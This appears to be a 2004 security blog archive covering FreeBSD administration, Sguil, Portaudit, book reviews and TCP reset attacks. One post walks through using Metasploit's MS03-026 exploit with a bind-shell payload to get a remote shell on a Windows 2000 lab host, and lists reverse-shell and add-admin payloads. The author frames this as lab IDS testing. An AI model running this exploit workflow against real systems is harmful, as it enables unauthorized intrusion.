Friday, April 30, 2004

Review of MySQL Tutorial Posted

Amazon.com just posted my five star review of MySQL Tutorial. From the review:

"MySQL is the database used by many commercial and open source security products. Although the user is often 'shielded' from interacting with the database directly, it's important and sometimes crucial to know basic MySQL administration.

MySQL Tutorial is the perfect companion to any security tool which depends on a MySQL database. For example, no one seriously expects to collect large amounts of data with Sguil and Snort unless a MySQL or similar database is working in the background. MySQL Tutorial gives the right details on the right subjects for those running integrated MySQL databases."

This book has a cover price of $29.99. It is refreshing to see a 267 page book priced appropriately, especially since you can get it for less than $20 at buy.com.

Thursday, April 29, 2004

Sguil 0.4.0 Released

Bamm released Sguil 0.4.0 yesterday. The changes are worth reading, but the major addition is the option to replace stream4 keepstats output with John Curry's open source SANCP (Security Analyst Network Connection Profiler) session data. SANCP is much more robust as it can track TCP, UDP, and ICMP, whereas stream4 only watched TCP. In this respect SANCP is like Argus. You can also tell the Sguil components a specified IP address to which they should bind. This facilitates the deployment of Sguil components in FreeBSD jails.

Tuesday, April 27, 2004

Fixing a Problematic Port

While trying to upgrade installed ports on a FreeBSD 4.9 STABLE machine, I encountered a problem with x11-fonts/libXft:

[Updating the pkgdb in /var/db/pkg ... - 125 packages found (-1 +0) (...) done]
---> Installing the new version via the port
===> Installing for libXft-2.1.6
===> libXft-2.1.6 depends on shared library: fontconfig.1 - found
===> libXft-2.1.6 depends on shared library: X11.6 - found
===> Generating temporary packing list
===> Checking if x11-fonts/libXft already installed
===> An older version of x11-fonts/libXft is already installed (Xft-2.1.2_1)
You may wish to ``make deinstall'' and install this port again
by ``make reinstall'' to upgrade it properly.
If you really wish to overwrite the old port of x11-fonts/libXft
without deleting it first, set the variable "FORCE_PKG_REGISTER"
in your environment or the "make install" command line.
*** Error code 1

Stop in /usr/ports/x11-fonts/libXft.
*** Error code 1

Stop in /usr/ports/x11-fonts/libXft.
** Command failed [exit code 1]: /usr/bin/script -qa /tmp/portupgrade6761.0 make reinstall
egrep: /var/db/pkg/libXft-2.1.5_1/+CONTENTS: No such file or directory
---> Restoring the old version
** Fix the installation problem and try again.
[Updating the pkgdb in /var/db/pkg ... - 126 packages found (-0 +1) . done]
** Listing the failed packages (*:skipped / !:failed)
! x11-fonts/libXft (libXft-2.1.5_1) (install error)
---> Packages processed: 0 done, 0 ignored, 0 skipped and 1 failed

I decided to use pkgdb -F to identify and fix problems:

janney:/var/db/pkg# pkgdb -F
---> Checking the package registry database
Duplicated origin: x11-fonts/libXft - Xft-2.1.2_1 libXft-2.1.5_1
Unregister any of them? [no] yes
Unregister Xft-2.1.2_1 keeping the installed files intact? [no] yes
-> libXft-2.1.5_1 is kept.
--> Saving the Xft-2.1.2_1's +CONTENTS file as /var/db/pkg/libXft-2.1.5_1/+CONTENTS.Xft-2.1.2_1
--> Unregistering Xft-2.1.2_1
--> Done.
[Updating the pkgdb in /var/db/pkg ... - 125 packages found (-1 +0) (...) done]
Stale dependency: firefox-0.8_4 -> Xft-2.1.2_1 (x11-fonts/libXft):
Fixed. (-> libXft-2.1.5_1)

Then I tried upgrading libXft again:

janney:/var/db/pkg# portupgrade -v libXft
---> Session started at: Tue, 27 Apr 2004 14:10:38 -0400
---> Upgrade of x11-fonts/libXft started at: Tue, 27 Apr 2004 14:10:42 -0400
---> Upgrading 'libXft-2.1.5_1' to 'libXft-2.1.6' (x11-fonts/libXft)
---> Build of x11-fonts/libXft started at: Tue, 27 Apr 2004 14:10:42 -0400
---> Building '/usr/ports/x11-fonts/libXft'
===> Cleaning for gettext-0.13.1_1
...edited...
===> Registering installation for libXft-2.1.6
===> Cleaning for gettext-0.13.1_1
===> Cleaning for gmake-3.80_2
===> Cleaning for imake-4.3.0_2
===> Cleaning for pkgconfig-0.15.0_1
===> Cleaning for freetype2-2.1.7_3
===> Cleaning for expat-1.95.7
===> Cleaning for fontconfig-2.2.2,1
===> Cleaning for XFree86-libraries-4.3.0_7
===> Cleaning for libXft-2.1.6
---> Removing the temporary backup files
---> Installation of x11-fonts/libXft ended at: Tue, 27 Apr 2004 14:11:42 -0400 (consumed 00:00:11)
---> Cleaning out obsolete shared libraries
[Updating the pkgdb in /var/db/pkg ... - 125 packages found (-0 +1) . done]
---> Upgrade of x11-fonts/libXft ended at: Tue, 27 Apr 2004 14:11:44 -0400 (consumed 00:01:02)
---> Listing the results (+:done / -:ignored / *:skipped / !:failed)
+ x11-fonts/libXft (libXft-2.1.5_1)
---> Packages processed: 1 done, 0 ignored, 0 skipped and 0 failed
---> Session ended at: Tue, 27 Apr 2004 14:11:46 -0400 (consumed 00:01:07)

It looks like it worked.

Review of WarDriving Posted

It's been a long time since my last book review, but I've been busy finishing and copyediting my own book. Thankfully the long flights to and from Vancouver for CanSecWest gave me some reading time. I spent part of that time with WarDriving, which I gave three stars. From the review:

"If you want to learn how to wardrive using Kismet or NetStumbler (and variants), WarDriving is for you. The book does a good job debunking certain myths, such as the prevalence of 'warchalking' or the widespread use of 'Pringles can antennas.' I found the practical advice, like disabling the TCP/IP stack on Windows prior to wardriving, especially helpful. The authors constantly advocate a professional mindset towards wardriving and do not suggest unethical use of insecure wireless networks."

Saturday, April 24, 2004

Comments on TCP Reset Worries

I attended Paul Watson's talk at CanSecWest this week on "Slipping in the Window" (.ppt slides, .doc paper. Paul was inspired by last year's Black Hat 2003 Las Vegas talk "BGP Vulnerability Testing" by Matthew Franz & Sean Convery (.pdf original talk). I attended that presentation as well, and found Matt and Sean's conclusion to be accurate: why bother with lower layer attacks when you can own the router? In other words, so many routers are misconfigured, it's not necessary to resort to spoofing or other elaborate games to disrupt global routing.

Paul dedided to focus on the likelihood of successful reset attacks against routers speaking BGP. He found that Matt and Sean's estimates for the time needed to guess the right TCP sequence number to reset a TCP connection were overstated. Matt and Sean did not take into account TCP receive windows, meaning a reset with a sequence number within the window would be accepted by the target. This makes it easier to reset a persistent connection, and TCP implementations with large windows are even easier to disrupt.

Matt and Sean posted an updated version of their paper acknowledging Paul's finds (.pdf).

A well-written advisory by the UK's NISCC states "an established connection will abort by sending a RST if it receives a duplicate SYN packet with initial sequence number within the TCP window." This means tearing down established connections can be done with SYN packets, not just RST packets.

CIsco published an advisory titled TCP Vulnerabilities in Multiple IOS-Based Cisco Products explaining the issue and listing fixes. It's important to note that since Cisco IOS 10.2 (very old!), IOS rate-limits RST packets by default. According to Cisco, "in the case of a storm of RST packets, they are effectively limited to one packet per second." This countermeasure effectively renders Paul's reset attack too slow to be workable. However, SYN packets are not rate-limited.

Cisco's rate limiting is not the only way to mitigate this attack. Anti-spoofing measures and not letting arbitrary traffic to inject itself between BGP speaking routers are other countermeasures.

I don't foresee the Internet dying at any time in the near future due to this discovery. Owning the target routers would probably be easier. Remember this is mainly a threat to persistent connections. No one is going to kill your Web browsing sessions with this sort of attack, but they would make your life miserable if you tried to download an .iso via FTP. Of course, how are attackers going to know what sessions to target?

Incidentally, while browsing Cisco's site I learning their IOS Upgrade Planner and Feature Navigator appears to be working again.

Update: Raven Adler spoke to the DC Security Geeks on 27 April about the BGP issue. Her talk was professional and informative. She worked on the same issue several years before Paul Watson's discoveries. She reported being involved in an incident response where an intruder physically attached a rogue laptop to a public peering point switch to disrupt and/or inject routing.

Thursday, April 22, 2004

ightning Talk is a Go at CanSecWest

I just finished delivering my lightning talk at the CanSecWest conference in beautiful Vancouver, BC. I spoke for five minutes on Sguil. My slightly update slides are available in .pdf form here.

Sunday, April 18, 2004

How to Renew DHCP IP Address with Cisco Router?

If anyone can help me with this, I would appreciate it.

I can't figure out how to have my Cisco router renew its DHCP lease with my cable ISP. I appear to not be the only person with this problem. I don't have any ACLs which would deny DHCP traffic, either.

This is the portion of my router config where I set up DHCP on the external interface:

interface FastEthernet0/0
ip address dhcp
ip access-group 101 in
ip nat outside
ip route-cache flow
duplex auto
speed auto
no cdp enable

Eventually my lease expires and I have to disable DHCP on fa0/0 because I can't reach the Internet:

gill#conf term
Enter configuration commands, one per line. End with CNTL/Z.
gill(config)#int fa0/0
gill(config-if)#no ip address dhcp

Upon issuing these commands my router releases its IP address, as seen with Tcpdump:

17:51:51.097987 68.50.168.243.68 > 172.30.100.36.67: xid:0x2570
C:68.50.168.243 ether 0:c:ce:4e:53:a0 vend-rfc1048
DHCP:RELEASE SID:172.30.100.36 CID:"cisco-000c.ce4e.53a0-Fa0/0"
[len 27] T99:115.99.111.45.48.48.48.99.46.99.101.52.101.46.53.51.97.48.45.70.97.48.47.48.255.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0

When I re-enable DHCP, my box receives a new IP:

gill(config-if)#ip address dhcp
gill(config-if)#^Z
gill#
17w6d: %SYS-5-CONFIG_I: Configured from console by console

Here's what Tcpdump sees. First we have the DHCP server making itself known and advertising what looks like a cable modem config file:

17:53:05.028597 10.71.136.1.67 > 255.255.255.255.68: xid:0x88291bab flags:0x8000
Y:10.71.136.74 S:172.30.100.35 G:10.71.136.1 ether 0:c:41:52:e4:72
file "mbefcmu10v2_v1_silver_c01" vend-rfc1048
DHCP:OFFER SID:172.30.100.36 SM:255.255.248.0 DG:10.71.136.1
LT:1209600 TZ:-18000 TS:172.30.100.35

17:53:05.121631 10.71.136.1.67 > 255.255.255.255.68: xid:0x88291bab flags:0x8000
Y:10.71.136.74 S:172.30.100.35 G:10.71.136.1 ether 0:c:41:52:e4:72
file "mbefcmu10v2_v1_silver_c01" vend-rfc1048
DHCP:ACK SID:172.30.100.36 SM:255.255.248.0 DG:10.71.136.1
LT:1209600 TZ:-18000 TS:172.30.100.35

Next my router asks for an IP from its unknown 0.0.0.0 address to the local broadcast 255.255.255.255 address:

17:53:07.180465 0.0.0.0.68 > 255.255.255.255.67: xid:0x1e7e flags:0x8000
ether 0:c:ce:4e:53:a0 vend-rfc1048 DHCP:DISCOVER MSZ:1152
CID:"cisco-000c.ce4e.53a0-Fa0/0"[len 27]
T99:115.99.111.45.48.48.48.99.46.99.101.52.101.46.53.51.97.48.45.70.97.
48.47.48.12.4.103.105.108.108.55.8.1.6.15.44.3.33.150.43.52.1.3.255.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0

Now it seems the DHCP server tries to ping the proposed address, and then offers an IP:

17:53:07.197072 172.30.100.36 > 68.50.168.243: icmp: echo request (DF)

17:53:07.298545 10.71.136.1.67 > 255.255.255.255.68: xid:0x1e7e flags:0x8000
Y:68.50.168.243 S:172.30.100.35 G:68.50.168.1 ether 0:c:ce:4e:53:a0
file "mdcm245_v1_silver_c01" vend-rfc1048
DHCP:OFFER SID:172.30.100.36 SM:255.255.254.0 DN:"manass01.va.comcast.net"
NS:68.48.0.13,68.87.96.15,68.48.0.5,68.87.96.16 DG:68.50.168.1 LT:604800

My box sends out another request. I thought this was a duplicate until I noticed the longer "T99" field.

17:53:07.300195 0.0.0.0.68 > 255.255.255.255.67: xid:0x1e7e flags:0x8000
ether0:c:ce:4e:53:a0 vend-rfc1048 DHCP:REQUEST MSZ:1152
CID:"cisco-000c.ce4e.53a0-Fa0/0"[len 27]
T99:115.99.111.45.48.48.48.99.46.99.101.52.101.46.53.51.97.48.45.70.97.
48.47.48.54.4.172.30.100.36.50.4.68.50.168.243.51.4.0.9.58.128.12.4.103.105.1
08.108.55.8.1.6.15.44.3.33.150.43.52.1.3.255.
0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0

17:53:07.317881 10.71.136.1.67 > 255.255.255.255.68: xid:0x1e7e flags:0x8000
Y:68.50.168.243 S:172.30.100.35 G:68.50.168.1 ether 0:c:ce:4e:53:a0
file "mdcm245_v1_silver_c01" vend-rfc1048
DHCP:ACK SID:172.30.100.36 SM:255.255.254.0 DN:"manass01.va.comcast.net"
NS:68.48.0.13,68.87.96.15,68.48.0.5,68.87.96.16 DG:68.50.168.1 LT:604800

17:53:07.319116 arp reply 68.50.168.243 is-at 0:c:ce:4e:53:a0

17:53:07.599113 10.71.136.1.67 > 255.255.255.255.68: xid:0x7b7aa96 flags:0x8000
Y:10.71.137.184 S:172.30.100.35 G:10.71.136.1 ether 0:8:e:ad:20:c4
file "msb4220_v1_silver_c01" vend-rfc1048
DHCP:OFFER SID:172.30.100.36 SM:255.255.248.0
DG:10.71.136.1 LT:1209600 TZ:-18000 TS:172.30.100.35

17:53:07.687973 10.71.136.1.67 > 255.255.255.255.68: xid:0x7b7aa96 flags:0x8000
Y:10.71.137.184 S:172.30.100.35 G:10.71.136.1 ether 0:8:e:ad:20:c4
file "msb4220_v1_silver_c01" vend-rfc1048
DHCP:ACK SID:172.30.100.36 SM:255.255.248.0
DG:10.71.136.1 LT:1209600 TZ:-18000 TS:172.30.100.35

17:53:16.265276 arp who-has 68.50.168.1 tell 68.50.168.243

17:53:16.272724 arp reply 68.50.168.1 is-at 0:3:fe:e3:8:70

17:53:16.420161 10.71.136.1.67 > 255.255.255.255.68: xid:0xffffa114 flags:0x8000
Y:10.71.116.208 S:172.30.100.35 G:10.71.136.1 ether 0:8:e:1b:a1:14
file "msb4100_v1_silver_c01" vend-rfc1048
DHCP:OFFER SID:172.30.100.36 VO:128 SM:255.255.254.0
DG:10.71.116.1 LT:1209600 TZ:-18000 TS:172.30.100.35

17:53:16.511679 10.71.136.1.67 > 255.255.255.255.68: xid:0xffffa114 flags:0x8000
Y:10.71.116.208 S:172.30.100.35 G:10.71.136.1 ether 0:8:e:1b:a1:14
file "msb4100_v1_silver_c01" vend-rfc1048
DHCP:ACK SID:172.30.100.36 VO:128 SM:255.255.254.0
DG:10.71.116.1 LT:1209600 TZ:-18000 TS:172.30.100.35

When everything is squared away I can ping my gateway:

17:53:16.609622 68.50.168.243 > 68.50.168.1: icmp: echo request

17:53:16.616916 68.50.168.1 > 68.50.168.243: icmp: echo reply

I obviously haven't figured out what all of this is, but I wanted to document it for future reference. It appears Cisco has a new command in 12.3 to release and renew DHCP addresses differently.

Calculating Security ROI Is a Waste of Time

I was pleased to read Infosec Economics by Lawrence Gordon and Robert Richardson in the 1 Apr 04 issue of Network Computing magazine. This duo says:

"ROI (or bang for the buck) can't be applied perfectly to information security because often the return on information security purchases and deployments is intangible. Sure, companies invest in some solutions that offer benefits beyond security--faster network throughput in a new router that supports VPNs, for example--and they can calculate the ROI of these indirect benefits. But security requires factoring in the expectation of loss."

I've been lucky to have never been tasked with calculating security's "return on investment," because I would have told my supervisor the answer is zero. There is no return to be made on security, because security is a loss avoidance and loss mitigation measure. Security is a way to deal with risk, which is the probability of loss. (I dealt with these definitions in Oct 04.)

"Investing" in security is not like investing in a more efficient metal-bending machine or sending an employee to a training class. Donald Trump does not receive any return on the investment he makes in bodyguards. All he does is provide a means to lessen the probability of bodily harm. He is not a more efficient businessman as a result of having bodyguards.

Obviously people value security, but it must be balanced by the threats one faces and the consequences of loss. Presidential candidates only receive Secret Service protection once they appear to be their party's nominee. Private citizens do not usually employ bodyguards. We make the decisions all the time but because digital security is an art with opaque threats, we have trouble choosing the appropriate level of security for our networks. Those who perform network security monitoring are more aware of these threats than the average CISO. NSM operators possess network awareness, thanks to the sorts of information they collect.

Economists have appreciated this fact for years. It looks like the 2004 CSI/FBI study will avoid ROI in favor of discussing net present value (NPV) and security as an externality. Stay tuned.

Friday, April 16, 2004

Tips on Network Hardware from Snort-Inline Mailing List

I'm trying to figure out if it's possible to build a FreeBSD-based filtering bridge running Snort-inline.

I submitted this question to see if anyone has FreeBSD and Snort-inline working. I just got this response from Alex Dupre:

"The bridge doesn't support the divert socket and will not support it. We are working on a different approach to use snort in inline mode on a bridge, but there isn't an ETA (surely not soon)."

While perusing the snort-inline-users mailing list I found this thread. It pointed me to makers of interesting network equipment. Emerging Technologies makes multi-port failover cards like the 2 port NIC pictured above.

Shore Microsystems also makes failover devices, except these are independent appliances like the SM-2500.

I have no personal experience with these devices, but the posters in the snort-inline list seemed to like them. I note them here as a reference in the event I may need a similar product in the future.

I'm considering buying a Cyclades-TS100 remote access device. AcmeMicro sells them for a little more than $300. I'd like to have remote access via either Ethernet or dial-up.

Update: Scott Bald of Shore Microsystems asked me to mention newer products which exceed the features of the SM 2500 mentioned above, specifically the SM 2501 and the SM 2512.

Interface Bonding on FreeBSD

The question of how to combine traffic seen by two physical network interfaces into a single virtual interface is popular on the various IDS lists I watch. Below is the script I use to create a ngeth0 interface using the FreeBSD ng_eth netgraph node:

bourque:/$ cat /usr/local/etc/rc.d/001.bond.sh
#!/bin/sh -x
# sf2 and sf3 are real interfaces which receive tap outputs; ngeth0 is created by ngctl

# ng_ether must be loaded so netgraph can "see" the real interfaces sf2 and sf3
kldload ng_ether

# bring up the real interfaces
ifconfig sf2 promisc -arp up
ifconfig sf3 promisc -arp up

# create ngeth0 and bind sf2 and sf3 to it
ngctl mkpeer . eiface hook ether
ngctl mkpeer ngeth0: one2many lower one
ngctl connect sf2: ngeth0:lower lower many0
ngctl connect sf3: ngeth0:lower lower many1

# bring up ngeth0 for sniffing duties
ifconfig ngeth0 -arp up

Linux has a channel bonding page at Sourceforge.

I devote an entire chapter of my book on how to get access to traffic on the wire, with instructions for SPAN ports, inline bridging devices, and the like.

Remember that creating virtual interfaces is one way to deal with the two TX outputs from traditional taps, like the Net Optics 10/100 Ethernet Tap. Their new 10/100 Ethernet Port Aggregator Tap offers a single TX output with RAM to buffer the original two TX lines.

Earthlink Study Measures Spyware Infections

NWFusion informed me of an interesting Earthlink.net press release. Earthlink reported the results of their customers running Webroot's Spy Audit program. This is a Windows executable which a user must download and run. Earthlink offers their own download, elsypaudit-i386-windows-all-2004.0.133.0.0.10.exe, which may be the same program, although the file sizes are fairly different.

Looking through strings output, I found a reference to http://spyauditresults.earthlink.net/index.php, which appears to be the results page once a scan is done.

I usually use Spybot Search & Destroy on Windows PC used by friends and family. I also used the Microsoft Update CD-ROM on systems with only dial-up modems.

The Earthlink study found an average of 28 instances of spyware per audited host. They also found over 184,000 installations of "system monitors," which Earthlink defines as programs that "can capture virtually everything you do on your computer, from keystrokes, emails, and chat room dialogue to which sites you visit and which programs you run." That sounds like Earthlink identified over 184,000 0wn3d Windows systems.

Thursday, April 15, 2004

Using Portaudit to Improve FreeBSD Security

I've started using the security/portaudit port to check the security status of FreeBSD's applications, so I thought I'd document my findings. Portaudit uses the Vulnerability and eXposure Markup Language, "an XML application for documenting security issues in a software package collection" like the FreeBSD ports system. You can browse the FreeBSD or OpenBSD VuXML pages to see vulnerabilities recorded since the VuXML project began in late 2003.

Using the VuXML database is as simple as installing the Portaudit port. Be sure to have an up-to-date ports tree (perhaps by using net/cvsup as documented here). Install Portaudit, and then run it as shown to check installed packages for problems. The -F flag tells Portaudit to fetch a new copy of the vulnerability database, while -a says check all installed ports/packages.

moog:/root# portaudit -F -a
>> Attempting to fetch from ftp://ftp.jp.FreeBSD.org/pub/FreeBSD/ports/local-distfiles/eik/.
new database installed.
Affected package: racoon-20040116a
Type of problem: racoon remote denial of service vulnerability (ISAKMP header length field).
Reference: ccd698df-8e20-11d8-90d1-0020ed76ef5a.html>

Affected package: racoon-20040116a
Type of problem: racoon remote denial of service vulnerability (IKE Generic Payload Header).
Reference: 40fcf20f-8891-11d8-90d1-0020ed76ef5a.html>

Affected package: racoon-20040116a
Type of problem: racoon fails to verify signature during Phase 1.
Reference: d8769838-8814-11d8-90d1-0020ed76ef5a.html>

Affected package: racoon-20040116a
Type of problem: tcpdump ISAKMP payload handling remote denial-of-service.
Reference: f8551668-de09-4d7b-9720-f1360929df07.html>

4 problem(s) in your installed packages found.

You are advised to update or deinstall the affected package(s) immediately.

At this point, since Portaudit found problems in security/racoon, we should upgrade that port immediately.

If Portaudit reports a clean bill of health, it looks like this:

moog:/root# portaudit -F -a
>> Attempting to fetch from ftp://ftp.jp.FreeBSD.org/pub/FreeBSD/ports/local-distfiles/eik/.
Receiving auditfile.tbz (4040 bytes): 100%
4040 bytes transferred in 0.2 seconds (19.51 kBps)
new database installed.
0 problem(s) in your installed packages found.

Portaudit works with sysutils/pkg_install-devel to warn sys admins when they try to install vulnerable software. In the following example, I try to install Ethereal using an out-of-date ports tree. The Ethereal port wants to install version 0.10.0a, which has multiple problems.

janney:/usr/ports/net/ethereal# make
===> ethereal-0.10.0a_2 has known vulnerabilities:
>> multiple vulnerabilities in ethereal.
Reference: cdf18ed9-7f4a-11d8-9645-0020ed76ef5a.html>
>> Please update your ports tree and try again.
*** Error code 1

Stop in /usr/ports/net/ethereal.

Portaudit can be used to check the status of a port before it is installed. Here we check for vulnerabilities in the Racoon port. By passing Portaudit the -C flag, we tell it to compare that specific port with the VuXML database.

janney:/usr/ports/security/racoon# portaudit -C

Port racoon-20040116a (security/racoon) should be marked FORBIDDEN:
- http://people.freebsd.org/~eik/portaudit/ccd698df-8e20-11d8-90d1-0020ed76ef5a.html
- http://people.freebsd.org/~eik/portaudit/40fcf20f-8891-11d8-90d1-0020ed76ef5a.html
- http://people.freebsd.org/~eik/portaudit/d8769838-8814-11d8-90d1-0020ed76ef5a.html
- http://people.freebsd.org/~eik/portaudit/f8551668-de09-4d7b-9720-f1360929df07.html

If we ran 'portaudit -A' in the /usr/ports directory, Portaudit would check for vulnerabilities in the entire ports tree.

Update: Jacques Vidrine posted a summary of VuXML to freebsd-security on 19 Apr 04.

Monday, April 12, 2004

MetaCoretex Simplifies Database Testing

If Metasploit weren't enough, I learned of MetaCoretex recently. It's a vulnerability scanning framework currently implemented for database assessment. It's written in Java, so be sure to have the JDK already installed.

After downloading and extracting the archive, the only change I made was to modify the last line of the mctx.sh script to know where to find Java on my FreeBSD system:

/usr/local/jdk1.4.2/jre/bin/java -cp ${CP} com.securitycentric.metacoretex.Init &

Execute the mctx.sh script, and MetaCoretex will launch an easy-to-use Java GUI. I plan to take a closer look at MetaCoretex once Visigoth pushes out a new release. Since I can remind him every day at work, hopefully we'll see 0.9 soon. :)

Visigoth presented MetaCoretex at a meeting of the DC Security Geeks. After the meeting the publisher of the Security Technique online journal requested prospective writers submit stories to his site.

Metasploit Framework in Action

You may have seen the Slashdot article on the Metasploit Project. From the project's Web site:

"The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This release includes 18 exploits and 27 payloads; many of these exploits are either the only ones publicly available or just much more reliable than anything else out there. The Framework will run on any modern system that has a working Perl interpreter."

I gave the project a try. First I read the Crash Course user's guide, which told me to install p5-ReadLine-Gnu. I did so using the FreeBSD ports tree:

orr:/usr/ports/devel/p5-ReadLine-Gnu# make install
===> Vulnerability check disabled, database not found
>> Term-ReadLine-Gnu-1.14.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
>> Attempting to fetch from http://www.cpan.dk/CPAN/modules/by-module/Term/.
Receiving Term-ReadLine-Gnu-1.14.tar.gz (65140 bytes): 100%
...truncated...

Once done, I ran the msfconsole and used one of the included exploits to compromise a Windows 2000 system in my lab. First I run msfconsole:

orr:/home/richard/framework-2.0$ perl ./msfconsole
+ -- --=[ msfconsole v2.0 [18 exploits - 27 payloads]

msf > help

Metasploit Framework Main Console Help
======================================

? Show the main console help
cd Change working directory
exit Exit the console
help Show the main console help
info Display detailed exploit or payload information
quit Exit the console
reload Reload exploits and payloads
save Save configuration to disk
setg Set a global environment variable
show Show available exploits and payloads
unsetg Remove a global environment variable
use Select an exploit by name
version Show console version

Next I check out the loaded exploits and select one for MS03-026:

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq Blackice/RealSecure/Other ISS ICQ Parser Buffer Overflow
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
imail_ldap IMail LDAP Service Buffer Overflow
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_resolution MSSQL 2000 Resolution Overflow
poptop_negative_read PoPToP Negative Read Overflow
realserver_describe_linux RealServer Describe Buffer Overflow
samba_trans2open Samba trans2open Overflow
sambar6_search_results Sambar 6 Search Results Buffer Overflow
servu_mdtm_overflow Serv-U FTPD MDTM Overflow
solaris_sadmind_exec Solaris sadmind Command Execution
warftpd_165_pass War-FTPD 1.65 PASS Overflow

msf > use msrpc_dcom_ms03_026

Once I have an exploit selected, I need to set the options it needs:

msf msrpc_dcom_ms03_026 > show options

Exploit Options
===============

Exploit: Name Default Description
-------- ------ ------- ------------------
required RPORT 135 The target port
required RHOST The target address

msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.3
RHOST -> 10.10.10.3

msf msrpc_dcom_ms03_026 > show targets

Supported Exploit Targets
=========================

0 Windows NT SP6/2K/XP ALL

With an exploit selected, I also need to choose a payload. This tells the Metasploit framework how I wish to interact with the target. I choose a simple binding connection.

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads
====================================

winadduser Create a new user and add to local Administrators group
winbind Listen for connection and spawn a shell
winbind_stg Listen for connection and spawn a shell
winbind_stg_upexec Listen for connection then upload and exec file
winexec Execute an arbitrary command
winreverse Connect back to attacker and spawn a shell
winreverse_stg Connect back to attacker and spawn a shell
winreverse_stg_ie Listen for connection, send address of GP/LL across,
read/exec InlineEgg
winreverse_stg_upexec Connect back to attacker and spawn a shell

msf msrpc_dcom_ms03_026 > info payload winbind

Name: winbind
Version: $Revision: 1.15 $
OS/CPU: win32/x86
Needs Admin: No
Multistage: No
Total Size: 374

Provided By:
H D Moore [Artistic License]

Available Options:
optional: EXITFUNC Exit technique: "process", "thread", "seh"
required: LPORT Listening port for bind shell

Description:
Listen for connection and spawn a shell

msf msrpc_dcom_ms03_026 > set PAYLOAD winbind
PAYLOAD -> winbind

msf msrpc_dcom_ms03_026(winbind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ---------- ------------------
required RPORT 135 The target port
required RHOST 10.10.10.3 The target address

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
optional EXITFUNC seh Exit technique: "process", "thread", "seh"
required LPORT Listening port for bind shell

msf msrpc_dcom_ms03_026(winbind) > set LPORT 9999
LPORT -> 9999

Once I have set the required options, I launch the exploit and get a shell:

msf msrpc_dcom_ms03_026(winbind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x90e5
[*] Got connection from 10.10.10.3:9999

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>netstat -na
...edited...
TCP 10.10.10.3:9999 192.168.50.2:26297 ESTABLISHED
...truncated...

I see this project providing an easy way to launch exploits to test IDS deployments. It's very powerful and flexible. Previously I used raccess to easily launch exploits for IDS testing purposes.

Monday, April 05, 2004

Flyer for Tao of NSM Book Posted

My publisher sent my a .pdf flyer for my book. I also created a books page with an abbreviated Tao of NSM table of contents listed.

Right now I'm in the copyedit phase. The publisher sends me chapters marked up in Microsoft Word and I make changes or comments as needed. I wrote most of the book in OpenOffice.org, but the publisher is more comfortable using Microsoft Office.

I just learned I was accepted to speak at USENIX Security 04 in San Diego on 9 August. I will be teaching a class on network security monitoring based on my book.

Sunday, April 04, 2004

Building and Deploying FreeBSD Packages

FreeBSD documentation is excellent, but I haven't found information on strategies for enterprise system administration duties. For example, what is the best way to deploy and upgrade software on multiple machines? Slashdot recently discussed building from source vs packages, but this topic doesn't get much public discussion. Most documentation talks about installing ports or packages from the perspective of a single machine. There's little or no material aside from newsgroup postings on ways to be more efficient.

It makes more sense to me to designate the most powerful system at hand as a "package builder." Sys admins build their own packages from source on this machine and then deploy them on workstations and other servers. For example, I use my Shuttle SB52G2, named 'neely', as a package builder. It runs FreeBSD 5.2.1, like most of the systems in my lab. Right now I'm building the newest OpenOffice port from source. It was recently updated to version 1.1.1. The FreeBSD OpenOffice.org site still shows packages for OO.org 1.1, and ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-current/All/ doesn't provide OpenOffice packages.

I'm building the package using this method:

cd /usr/ports/editors/openoffice-1.1
make package-recursive install

This tells FreeBSD to create a package for OpenOffice in /usr/ports/packages/All. (Note you need to create this directory if you don't have it already.) Saying "package-recursive" instead of just "package" tells FreeBSD to create packages of all of OpenOffice's dependencies. How do I know this? Look at /usr/ports/Mk/bsd.port.mk, where we find:

# package - Create a package from an _installed_ port.
# package-recursive - Create a package for a port and _all_ of its dependancies.

I am building OO.org on neely, but it's already installed on my laptop, 'orr'. To share the packages built on neely, I export neely's /usr/ports directory via NFS. This means I only have to upgrade the ports tree on neely. I use the following script to keep neely's ports tree up-to-date. If I want to use a specific CVS server, I comment out the SERVER variable using 'fastest_cvsup' and uncomment the SERVER variable using a named CVS server. If I want to clean up the distfiles and so forth, I uncomment the portsclean command at the end of the script.

#!/bin/sh
# Ports updater by Richard Bejtlich
# 0925 07 Nov 03
# 2100 07 Feb 04 - added portsclean -CDD

SERVER=`fastest_cvsup -q -c us`
START_TIME=`/bin/date`

#SERVER=cvsup16.freebsd.org

echo "Starting ports update at $START_TIME."

echo "cvsup -g -L 2 -h $SERVER /usr/local/etc/ports-supfile"
cvsup -g -L 2 -h $SERVER /usr/local/etc/ports-supfile

